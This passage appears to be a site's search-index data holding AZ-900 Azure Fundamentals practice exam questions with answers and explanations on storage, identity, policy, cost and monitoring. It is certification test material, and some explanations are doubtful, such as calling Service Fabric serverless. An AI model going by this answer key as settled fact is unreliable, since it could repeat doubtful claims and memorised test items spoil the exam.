        • a resource group

        Resources are combined into resource groups, which act as a logical container into which Azure resources like web apps, databases, and storage accounts, are deployed and managed. Describe the core architectural components of Azure - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-16-of-50","title":"Question 16 of 50","text":"

        Select the answer that correctly completes the sentence.

        In a region pair, a region is paired with another region in the same\u00a0(------Your Answer Here -------).

        • geography

        Each Azure region is always paired with another region within the same geography, such as US, Europe, or Asia, at least 300 miles away. Describe the core architectural components of Azure - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-17-of-50","title":"Question 17 of 50","text":"

        What is an Azure Storage account named storage001 an example of?

        • a resource

        A resource is a manageable item that is available through Azure. Virtual machines, storage accounts, web apps, databases, and virtual networks are examples of resources. Describe the core architectural components of Azure - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-18-of-50","title":"Question 18 of 50","text":"

        For which resource does Azure generate separate billing reports and invoices by default?

        • subscriptions

        Azure generates separate billing reports and invoices for each subscription so that you can organize and manage costs. Resource groups can be used to group costs, but you will not receive a separate invoice for each resource group. Management groups are used to efficiently manage access, policies, and compliance for subscriptions. You can set up billing profiles to roll up subscriptions into invoice sections, but this requires customization. Describe the core architectural components of Azure - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-19-of-50","title":"Question 19 of 50","text":"

        Which resource can you use to manage access, policies, and compliance across multiple subscriptions?

        • management groups

        Management groups can be used in environments that have multiple subscriptions to streamline the application of governance conditions. Resource groups can be used to organize Azure resources. A inistrative units are used to delegate the administration of Azure AD resources, such as users and groups. Accounts are used to provide access to resources

        Describe the core architectural components of Azure - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-20-of-50","title":"Question 20 of 50","text":"

        Select the answer that correctly completes the sentence.

        (------Your Answer Here -------)\u00a0is the deployment and management service for Azure.

        • Azure Resource Manager (ARM)

        ARM is the deployment and management service for Azure. It provides a management layer that enables you to create, update, and delete resources in an Azure subscription. You use management features, such as access control, resource locks, and resource tags, to secure and organize resources after deployment. Describe the core architectural components of Azure - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-21-of-50","title":"Question 21 of 50","text":"

        What can you use to execute code in a serverless environment?

        • Azure Functions

        Azure Functions allows you to run code as a service without having to manage the underlying platform or infrastructure. Azure Logic Apps is similar to Azure Functions, but uses predefined workflows instead of developing your own code. Describe Azure compute and networking services - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-22-of-50","title":"Question 22 of 50","text":"

        What can you use to connect Azure resources, such as Azure SQL databases, to an Azure virtual network?

        • service endpoints

        Service endpoints are used to expose Azure services to a virtual network, providing communication between the two. ExpressRoute is used to connect an on-premises network to Azure. NSGs allow you to configure inbound and outbound rules for virtual networks and virtual machines. Peering allows you to connect virtual networks together. Describe Azure compute and networking services - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-23-of-50","title":"Question 23 of 50","text":"

        Which two services can you use to establish network connectivity between an on-premises network and Azure resources? Each correct answer presents a complete solution.

        • Azure VPN Gateway
        • ExpressRoute

        ExpressRoute connections and Azure VPN Gateway are two services that you can use to connect an on-premises network to Azure. Bastion provides a web interface to remotely administer Azure virtual machines by using SSH/RDP. Azure Firewall is a stateful firewall service used to protect virtual networks. Azure ExpressRoute: Connectivity models | Microsoft Learn. Describe Azure compute and networking services - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-24-of-50","title":"Question 24 of 50","text":"

        Which storage service should you use to store thousands of files containing text and images?

        • Azure Blob storage

        Azure Blob storage is an object storage solution that you can use to store massive amounts of unstructured data, such as text or binary data. Describe Azure storage services - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-25-of-50","title":"Question 25 of 50","text":"

        Which Azure Blob storage tier stores data offline and offers the lowest storage costs and the highest costs to access data?

        • Archive

        The Archive storage tier stores data offline and offers the lowest storage costs, but also the highest costs to rehydrate and access data. The Hot storage tier is optimized for storing data that is accessed frequently. Data in the Cool access tier can tolerate slightly lower availability, but still requires high durability, retrieval latency, and throughput characteristics similar to hot data. Describe Azure storage services - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-26-of-50","title":"Question 26 of 50","text":"

        Which storage service offers fully managed file shares in the cloud that are accessible by using Server Message Block (SMB) protocol?

        • Azure Files

        Azure Files offers fully managed file shares in the cloud with shares that are accessible by using Server Message Block (SMB) protocol. Mounting Azure file shares is just like connecting to shares on a local network. Describe Azure storage services - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-27-of-50","title":"Question 27 of 50","text":"

        Which two scenarios are common use cases for Azure Blob storage? Each correct answer presents a complete solution.

        • serving images or documents directly to a browser
        • storing data for backup and restore

        Low storage costs and unlimited file formats make blob storage a good location to store backups and archives. Blob storage can be reached from anywhere by using an internet connection. Azure Disk Storage provides disks for Azure virtual machines. Azure Files supports mounting file storage shares. Describe Azure storage services - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-28-of-50","title":"Question 28 of 50","text":"

        Which Azure Blob storage service tier has the highest storage costs and the fastest access times for reading and writing data?

        • Hot

        The Hot tier is optimized for storing data that is accessed frequently. The Cool access tier has a slightly lower availability SLA and higher access costs compared to hot data, which are acceptable trade-offs for lower storage costs. Archive storage stores data offline and offers the lowest storage costs, but also the highest costs to rehydrate and access data. Describe Azure storage services - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-29-of-50","title":"Question 29 of 50","text":"

        Which two protocols are used to access Azure file shares? Each correct answer presents a complete solution.

        • Network File System (NFS)
        • Server Message Block (SMB)

        Azure Files offers fully managed file shares in the cloud that are accessible via industry-standard SMB and NFS protocols. Describe Azure storage services - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-30-of-50","title":"Question 30 of 50","text":"

        What enables a user to sign in one time and use that credential to access multiple resources and applications from different providers?

        • single sign-on (SSO)

        SSO enables a user to sign in one time and use that credential to access multiple resources and applications from different providers. MFA is a process whereby a user is prompted during the sign-in process for an additional form of identification. Conditional Access is a tool that Azure AD uses to allow or deny access to resources based on identity signals. Azure AD supports the registration of devices. Describe Azure identity, access, and security - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-31-of-50","title":"Question 31 of 50","text":"

        What can you use to allow a user to manage all the resources in a resource group?

        • Azure role-based access control (RBAC)

        Azure RBAC allows you to assign a set of permissions to a user or group. Resource tags are used to locate and act on resources associated with specific workloads, environments, business units, and owners. Resource locks prevent the accidental change or deletion of a resource. Key Vault is a centralized cloud service for storing an application secrets in a single, central location. Describe Azure identity, access, and security - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-32-of-50","title":"Question 32 of 50","text":"

        Which type of strategy uses a series of mechanisms to slow the advancement of an attack that aims to gain unauthorized access to data?

        • defense in depth

        A defense in depth strategy uses a series of mechanisms to slow the advancement of an attack that aims to gain unauthorized access to data. The principle of least privilege means restricting access to information to only the level that users need to perform their work. A DDoS attack attempts to overwhelm and exhaust an application's resources. The perimeter layer is about protecting an organization's resources from network-based attacks. Describe Azure identity, access, and security - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-33-of-50","title":"Question 33 of 50","text":"

        Which two services are provided by Azure AD? Each correct answer presents a complete solution.

        • authentication
        • single sign-on (SSO)

        Azure AD provides services for verifying identity and access to applications and resources. SSO enables you to remember a single username and password to access multiple applications and is available in Azure AD. Describe Azure identity, access, and security - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-34-of-50","title":"Question 34 of 50","text":"

        You have an Azure virtual machine that is accessed only between 9:00 and 17:00 each day.

        What should you do to minimize costs but preserve the associated hard disks and data?

        • Resize the virtual machine. This answer is incorrect.

        • Deallocate the virtual machine. This answer is correct.

        If you have virtual machine workloads that are used only during certain periods, but you run them every hour of every day, then you are wasting money. These virtual machines are great candidates to deallocate when not in use and start back when required to save compute costs while the virtual machines are deallocated. Describe cost management in Azure - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-35-of-50","title":"Question 35 of 50","text":"

        You need to associate the costs of resources to different groups within an organization without changing the location of the resources. What should you use?

        • subscriptions. This answer is incorrect.

        • resource tags. This answer is correct.

        Resource tags can be used to group billing data and categorize costs by runtime environment, such as billing usage for virtual machines running in a production environment. Tag resources, resource groups, and subscriptions for logical organization - Azure Resource Manager | Microsoft Learn. Describe the purpose of tags - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-36-of-50","title":"Question 36 of 50","text":"

        Your organization plans to deploy several production virtual machines that will have consistent resource usage throughout the year. What can you use to minimize the costs of the virtual machines without reducing the functionality of the virtual machines?

        • Azure Reservations

        Azure Reservations offers discounted prices on certain Azure services. Azure Reservations can save you up to 72 percent compared to pay-as-you-go prices. To receive a discount, you can reserve services and resources by paying in advance.Spending limits can suspend a subscription when the spend limit is reached. Describe cost management in Azure - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-37-of-50","title":"Question 37 of 50","text":"

        What can be applied to a resource to prevent accidental deletion?

        • a resource lock

        A resource lock prevents resources from being accidentally deleted or changed. Resource tags offer the custom grouping of resources. Policies enforce different rules across all resource configurations so that the configurations stay compliant with corporate standards. An initiative is a way of grouping related policies together. Describe features and tools in Azure for governance and compliance - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-38-of-50","title":"Question 38 of 50","text":"

        You need to recommend a solution for Azure virtual machine deployments. The solution must enforce company standards on the virtual machines. What should you include in the recommendation?

        • Azure Blueprints. This answer is incorrect.

        • Azure Policy. This answer is correct.

        Azure policies will allow you to enforce company standards on new virtual machines when combined with Azure VM Image Builder and Azure Compute Gallery. By using Azure Policy and role-based access control (RBAC) assignments, enterprises can enforce standards on Azure resources. But on virtual machines, these mechanisms only affect the control plane or the route to the virtual machine. Describe features and tools in Azure for governance and compliance - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-39-of-50","title":"Question 39 of 50","text":"

        You need to ensure that multi-factor authentication (MFA) is enabled on accounts with write permissions in an Azure subscription. What should you implement?

        • Azure Policy

        Azure Policy is a service in Azure that enables you to create, assign, and manage policies that control or audit resources. Describe features and tools in Azure for governance and compliance - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-40-of-50","title":"Question 40 of 50","text":"

        What can you use to restrict the deployment of a virtual machine to a specific location?

        • Azure Policy

        Azure Policy can help to create a policy for allowed regions, which enables you to restrict the deployment of virtual machines to a specific location. Overview of Azure Policy - Azure Policy | Microsoft Learn. Describe the purpose of Azure Policy - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-41-of-50","title":"Question 41 of 50","text":"

        Which management layer accepts requests from any Azure tool or API and enables you to create, update, and delete resources in an Azure account?

        • Azure Resource Manager (ARM)

        ARM is the deployment and management service for Azure. It provides a management layer that enables you to create, update, and delete resources in an Azure account. Describe features and tools for managing and deploying Azure resources - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-42-of-50","title":"Question 42 of 50","text":"

        What can you use to manage servers across cloud platforms and on-premises environments?

        • Azure Arc

        Azure Arc simplifies governance and management by delivering a consistent multi-cloud and on-premises management platform. Describe features and tools for managing and deploying Azure resources - Training | Microsoft Learn. Describe the purpose of Azure Arc - Training | Microsoft Learn.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-43-of-50","title":"Question 43 of 50","text":"

        What provides recommendations to reduce the cost of Azure resources?

        • Azure Advisor

        Azure Advisor analyzes the account usage and makes recommendations based on its set and configured rules. Describe monitoring tools in Azure - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-44-of-50","title":"Question 44 of 50","text":"

        You have a team of Linux administrators that need to manage the resources in Azure. The team wants to use the Bash shell to perform the administration. What should you recommend?

        • Azure CLI

        Azure CLI allows you to use the Bash shell to perform administrative tasks. Bash is used in Linux environments, so a Linux administrator will probably be more comfortable performing command-line administration from Azure CLI. Describe features and tools for managing and deploying Azure resources - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-45-of-50","title":"Question 45 of 50","text":"

        You need to create a custom solution that uses thresholds to trigger autoscaling functionality to scale an app up or down to meet user demand. What should you include in the solution?

        • Application insights. This answer is incorrect.

        • Azure Monitor. This answer is correct.

        Azure Monitor is a platform that collects metric and logging data, such as CPU percentages. The data can be used to trigger autoscaling. Describe monitoring tools in Azure - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-46-of-50","title":"Question 46 of 50","text":"

        What should you proactively review and act on to avoid service interruptions, such as service retirements and breaking changes?

        • Azure Monitor. This answer is incorrect.

        • health advisories. This answer is correct.

        Health advisories are issues that require that you take proactive action to avoid service interruptions, such as service retirements and breaking changes. Service issues are problems such as outages that require immediate actions. Describe monitoring tools in Azure - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-47-of-50","title":"Question 47 of 50","text":"

        What can you use to get notification about an outage in a specific Azure region?

        • Azure Service Health

        Service Health notifies you of Azure-related service issues, such as region-wide downtime. Describe monitoring tools in Azure - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-48-of-50","title":"Question 48 of 50","text":"

        Which Azure service can generate an alert if virtual machine utilization is over 80% for five minutes?

        • Azure Monitor

        Azure Monitor is a platform for collecting, analyzing, visualizing, and alerting based on metrics. Azure Monitor can log data from an entire Azure and on-premises environment. Describe monitoring tools in Azure - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-49-of-50","title":"Question 49 of 50","text":"

        What can you apply to an Azure virtual machine to ensure that users cannot change or delete the resource?

        • a lock

        Protect your Azure resources with a lock - Azure Resource Manager | Microsoft Learn Describe features and tools in Azure for governance and compliance - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-50-of-50","title":"Question 50 of 50","text":"

        Which feature in the Microsoft Purview governance portal should you use to manage access to data sources and datasets?

        Your Answer:

        • Data Estate Insights. This answer is incorrect.
        • Data Policy. This answer is correct.

        Incorrect: Data Catalog \u2013\u2013 This enables data discovery. Incorrect: Data Sharing \u2013\u2013 This shares data within and between organizations. Incorrect: Data Estate Insights \u2013\u2013 This accesses data estate health. Correct: Data Policy \u2013\u2013 This governs access to data.

        Introduction to Microsoft Purview governance solutions - Microsoft Purview | Microsoft Learn. Describe features and tools in Azure for governance and compliance - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#exams-from-course-az-900-microsoft-azure-fundamentals-original-practice-tests","title":"Exams from \"Course AZ-900: Microsoft Azure Fundamentals Original Practice Tests\"","text":"

        Exams from the Udemy course AZ-900: Microsoft Azure Fundamentals Original Practice Tests.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#test-1","title":"Test 1","text":"","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-1-which-azure-feature-is-specifically-designed-to-help-companies-get-their-in-house-developed-code-from-the-code-repository-through-automated-unit-testing-and-onto-azure-using-a-service-called-pipelines","title":"Question 1:\u00a0Which Azure feature is specifically designed to help companies get their in-house developed code from the code repository, through automated unit testing, and onto Azure using a service called Pipelines?","text":"
        • Azure Monitor
        • GitHub
        • Azure DevOps
        • Virtual Machines

        Explanation: Azure DevOps contains many services, one of which is Pipelines. Pipelines allows you to build an automation that moves code (and all related dependencies) through various stages from the development environment into deployment.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-2-true-or-false-there-are-no-service-level-guarantees-sla-when-a-service-is-in-general-availability-ga","title":"Question 2: True or false: there are no service level guarantees (SLA) when a service is in General Availability (GA)","text":"
        • FALSE
        • TRUE

        Explanation: False, most Azure GA services do have service level agreements. See:\u00a0https://azure.microsoft.com/en-ca/support/legal/sla/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-3-which-ways-does-the-azure-resource-manager-model-provide-to-deploy-resources","title":"Question 3:\u00a0Which ways does the Azure Resource Manager model provide to deploy resources?","text":"
        • CLI
        • Powershell
        • Azure Portal
        • REST API / SDK

        Explanation: Azure Resource Manager (ARM) is the deployment and management service for Azure. It provides a management layer that enables you to create, update, and delete resources in your Azure account. The ARM model allows you to work with resources in a consistent manner, whether through Azure portal, PowerShell, REST APIs/SDKs, or the Command-Line Interface (CLI).

        1. Azure Portal: This is a web-based, unified console that provides an alternative to command-line tools. You can manage your Azure resources directly through a GUI.

        2. PowerShell: Azure PowerShell is a module that provides cmdlets to manage Azure through Windows PowerShell and PowerShell Core. You can use it to build scripts for managing and automating your Azure resources.

        3. REST API / SDK: Azure provides comprehensive REST APIs that can be used directly or via Azure SDKs available in multiple languages. This allows developers to integrate Azure services in their applications, services, or tools.

        4. CLI: Azure CLI is a cross-platform command-line program that connects to Azure and executes administrative commands on Azure resources. It's designed to make scripting easy, authenticate with Azure platform, and quickly run commands to perform common administrative tasks or deploy to Azure.

        Each of these methods supports the full set of Azure Resource Manager features, and you can choose the one that best fits your workflow. See:\u00a0https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-4-what-type-of-container-is-used-to-collect-log-and-metric-data-from-various-azure-resources","title":"Question 4: What type of container is used to collect log and metric data from various Azure Resources?","text":"
        • Log Analytics Workspace
        • Managed Storage
        • Append Blob Storage
        • Azure Monitor account

        Explanation: Log Analytics Workspace is required to collect logs and metrics. See:\u00a0https://docs.microsoft.com/en-us/azure/azure-monitor/platform/manage-access

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-5-which-azure-service-is-meant-to-be-a-security-dashboard-that-contains-all-the-security-and-threat-protection-in-one-place","title":"Question 5:\u00a0Which Azure service is meant to be a security dashboard that contains all the security and threat protection in one place?","text":"
        • Azure Portal Dashboard
        • Azure Security Center
        • Azure Key Vault
        • Azure Monitor

        Explanation: Azure Security Center - unified security management and threat protection; a security dashboard inside Azure Portal. See:\u00a0https://azure.microsoft.com/en-us/services/security-center/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-6-what-is-a-ddos-attack","title":"Question 6: What is a DDoS attack?","text":"
        • A denial of service attack that sends so much traffic to a network that it cannot respond fast enough; legitimate users become unable to use the service
        • An attempt to read the contents of a web page from another website, thereby stealing the user's private information
        • An attempt to send SQL commands to the server in a way that it will execute them against the database
        • An attempt to guess a user's password through brute force methods

        Explanation: Distributed Denial of Service attacks (DDoS) -a type of attack that originates from the Internet that attempts to overwhelm a network with millions of packets of bad traffic that aims to prevent legitimate traffic from getting through. See:\u00a0https://docs.microsoft.com/en-us/azure/virtual-network/ddos-protection-overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-7-in-the-context-of-cloud-computing-and-azure-services-how-would-you-define-compute-resources","title":"Question 7:\u00a0In the context of cloud computing and Azure services, how would you define 'compute resources'?","text":"
        • They include all resources listed in the Azure Marketplace.
        • They are resources that execute tasks requiring CPU cycles.
        • They refer exclusively to Virtual Machines.
        • They encompass Virtual Machines, Storage Accounts, and Virtual Networks.

        Explanation: The correct answer is \"They are resources that execute tasks requiring CPU cycles\". In cloud computing, the term \"compute\" refers to the amount of computational power required to process a task - essentially, it's anything that uses processing power (CPU cycles) to perform operations. This includes, but is not limited to, running applications, executing scripts, and processing data. While virtual machines (VMs) are a common type of compute resource, they are not the only type. Azure offers a wide variety of compute resources, like Azure Functions for serverless computing, Azure Kubernetes Service for container-based applications, and Azure Batch for parallel and high-performance computing tasks. So, the definition of compute resources is broader than just VMs or certain resources listed in the Azure Marketplace. It also includes more than VMs, Storage Accounts, and Virtual Networks, as these other resources (storage and networking) have distinct roles separate from the compute resources. Storage accounts deal with data storage while virtual networks are concerned with networking aspects in Azure, not with performing tasks that require CPU cycles. Therefore, \"They are resources that execute tasks requiring CPU cycles\" is the most accurate answer. See:\u00a0https://azure.microsoft.com/en-us/product-categories/compute/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-8-which-azure-service-contains-pre-built-machine-learning-models-that-you-can-use-in-your-own-code-using-an-api","title":"Question 8:\u00a0Which\u00a0Azure Service contains pre-built machine learning models that you can use in your own code, using an API?","text":"
        • Cognitive Services
        • Azure Functions
        • Azure Blueprints
        • App Services

        Explanation: Cognitive Services is an API that Azure provides, that gives access to a set of pre-built machine learning models including vision services, speech services, knowledge management and chat bots.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-9-in-microsoft-azure-what-is-the-maximum-number-of-virtual-machines-that-can-be-included-in-a-single-virtual-machine-scale-set-as-per-azures-standard-guidelines-and-capabilities","title":"Question 9: In Microsoft Azure, what is the maximum number of virtual machines that can be included in a single Virtual Machine Scale Set, as per Azure's standard guidelines and capabilities?","text":"
        • 10000
        • 1000
        • Unlimited
        • 500

        Explanation: The correct answer is 1000. Azure Virtual Machine Scale Sets are a service provided by Azure that allows you to manage, scale, and distribute large numbers of identical virtual machines. As per the limitations set by Microsoft Azure, a single Virtual Machine Scale Set can support up to 1000 VM instances. This capacity allows for high availability and network load balancing across a large number of virtual machines, providing a robust and efficient solution for applications that require heavy compute resources. However, if you are using custom VM images, this limit decreases to 600 instances. This functionality is part of Azure's Infrastructure as a Service (IaaS) offerings, providing flexibility and scalability to businesses and developers. See:\u00a0https://docs.microsoft.com/en-us/azure/virtual-machine-scale-sets/overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-10-what-feature-within-azure-will-make-recommendations-to-you-about-reducing-cost-on-your-account","title":"Question 10:\u00a0What feature within Azure will make recommendations to you about reducing cost on your account?","text":"
        • Azure Service Health
        • Azure Security Center
        • Azure Advisor
        • Azure Dashboard

        Explanation: Azure Advisor analyzes your account usage and makes recommendations for you based on its set rules. See:\u00a0https://docs.microsoft.com/en-us/azure/advisor/advisor-overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-11-your-organization-has-implemented-an-azure-policy-that-restricts-the-type-of-virtual-machine-instances-you-can-use-how-can-you-create-a-vm-that-is-blocked-by-the-policy","title":"Question 11: Your organization has implemented an Azure Policy that restricts the type of Virtual Machine instances you can use. How can you create a VM that is blocked by the policy?","text":"
        • Use an account that has Contributor or above permissions to the resource group
        • Subscription Owners (Administrators) can create resources regardless of what the policy restricts
        • The only way is to remove the policy, create the resource and add the policy back

        Explanation: You cannot perform a task that violates policy, so you have to remove the policy in order to perform the task. See:\u00a0https://docs.microsoft.com/en-us/azure/governance/policy/overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-12-you-have-decided-to-subscribe-to-azure-ddos-protection-at-the-ip-protection-tier-this-provides-advanced-protection-to-defend-against-ddos-attacks-what-type-of-ddos-attack-does-ddos-protection-not-protect-against","title":"Question 12:\u00a0You have decided to subscribe to Azure DDoS\u00a0Protection at the IP Protection Tier. This provides advanced protection to defend against DDoS attacks. What type of DDoS attack does DDoS Protection NOT\u00a0protect against?","text":"
        • Transport (L4)\u00a0level attacks
        • Application (L7) level attacks
        • Network (L3)\u00a0level attacks

        Explanation: The correct answer is \"Application level attacks\":

        • Network-level attacks\u00a0are attacks that target the network infrastructure, such as the routers and switches that connect your Azure resources to the internet. Azure DDoS Protection IP Protection Tier can protect against network-level attacks by absorbing and rerouting excessive traffic, and by scrubbing malicious traffic.

        • Transport-level attacks\u00a0are attacks that target the transport layer of the network protocol stack, such as TCP and UDP. Azure DDoS Protection IP Protection Tier can protect against transport-level attacks by absorbing and rerouting excessive traffic, and by scrubbing malicious traffic.

        • Application-level attacks\u00a0are attacks that target the application layer of the network protocol stack, such as HTTP and DNS. Azure DDoS Protection IP Protection Tier\u00a0does not\u00a0protect against application-level attacks, because it is designed to protect against network and transport-level attacks.

        To protect against application-level attacks, you need to use a web application firewall (WAF). A WAF is a software appliance that sits in front of your application and filters out malicious traffic. WAFs can be configured to protect against a wide variety of application-level attacks, such as SQL injection, cross-site scripting, and denial of service attacks. See:\u00a0https://docs.microsoft.com/en-us/azure/virtual-network/ddos-protection-overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-13-which-of-the-following-characteristics-of-a-cloud-based-system-primarily-contributes-to-its-elasticity","title":"Question 13: Which of the following characteristics of a cloud-based system primarily contributes to its elasticity?","text":"
        • The system's ability to recover automatically after a crash.
        • The system's ability to dynamically increase and decrease capacity based on real-time demand.
        • The system's ability to maintain availability while updates are being implemented.
        • The system's ability to withstand denial-of-service attacks.

        Explanation: The correct answer is \"The ability to increase and reduce capacity based on actual demand.\" This characteristic refers to the concept of\u00a0elasticity\u00a0in cloud computing. An elastic system\u00a0is one that can automatically adjust its resources\u00a0(compute, storage, etc.) in response to changing workloads and demands. This is done to ensure optimal performance and cost-effectiveness. When demand increases, the system can scale out by adding more resources, and when demand decreases, it can scale in by reducing resources, all without significant manual intervention. The other options, while important for overall system robustness, do not define elasticity. Withstanding denial of service attacks pertains to security, maintaining availability during updates refers to zero-downtime deployment or high availability, and self-healing after a crash refers to resilience or fault tolerance. None of these are about dynamically adjusting capacity based on demand, which is the hallmark of an elastic system. See:\u00a0https://azure.microsoft.com/en-us/overview/what-is-elastic-computing/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-14-logic-apps-functions-and-service-fabric-are-all-examples-of-what-model-of-compute-within-azure","title":"Question 14:\u00a0Logic apps, functions, and service fabric are all examples of what model of compute within Azure?","text":"
        • SaaS model
        • App Services Model
        • IaaS model
        • Serverless model

        Explanation: The correct answer is the Serverless model. Azure Logic Apps, Azure Functions, and Azure Service Fabric are all examples of serverless computing in Azure. Serverless computing is a cloud computing model where the cloud provider automatically manages the provisioning and allocation of servers, hence the term \"serverless\". The serverless model allows developers to focus on writing the code and business logic rather than worrying about the underlying infrastructure, its setup, maintenance, scaling, and capacity planning.

        • Azure Logic Apps is a cloud service that allows developers to build workflows that integrate apps, data, services, and systems.
        • Azure Functions is an event-driven, compute-on-demand experience that extends the existing Azure application platform with capabilities to implement code triggered by events occurring in Azure or third-party services.
        • Azure Service Fabric is a distributed systems platform that makes it easy to package, deploy, and manage scalable and reliable microservices.

        In contrast, IaaS (Infrastructure as a Service) refers to cloud-based services where you rent IT infrastructure\u2014servers and virtual machines (VMs), storage, networks, and operating systems\u2014from a cloud provider on a pay-as-you-go basis. SaaS (Software as a Service) is a software distribution model in which a third-party provider hosts applications and makes them available to customers over the Internet, which doesn't align with the services mentioned in the question. The App Services model is a platform for hosting web applications, REST APIs, and mobile backends, but it's not strictly serverless as it doesn't auto-scale in the same way. See:\u00a0https://azure.microsoft.com/en-us/solutions/serverless/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-15-what-is-a-primary-benefit-of-opting-for-a-consumption-based-pricing-model-over-a-time-based-pricing-model-in-cloud-services","title":"Question 15: What is a primary benefit of opting for a consumption-based pricing model over a time-based pricing model in cloud services?","text":"
        • The ability to easily predict the future cost of the service.
        • It always being cheaper to pay for consumption rather than paying hourly.
        • Significant cost savings when the resources aren't needed for constant use.
        • A simpler and easier-to-understand pricing model.

        Explanation: The correct answer is \"Significant cost savings when the resources aren't needed for constant use\". In a consumption-based pricing model, also known as pay-as-you-go, customers are billed only for the specific resources they use. This model provides cost-efficiency for workloads with variable usage patterns or for resources that aren't needed continuously.

        When compared to a time-based pricing model, where resources are billed on a fixed schedule regardless of actual use (for example, hourly or monthly), consumption-based pricing can result in significant cost savings if the resources are not used often or their usage fluctuates.

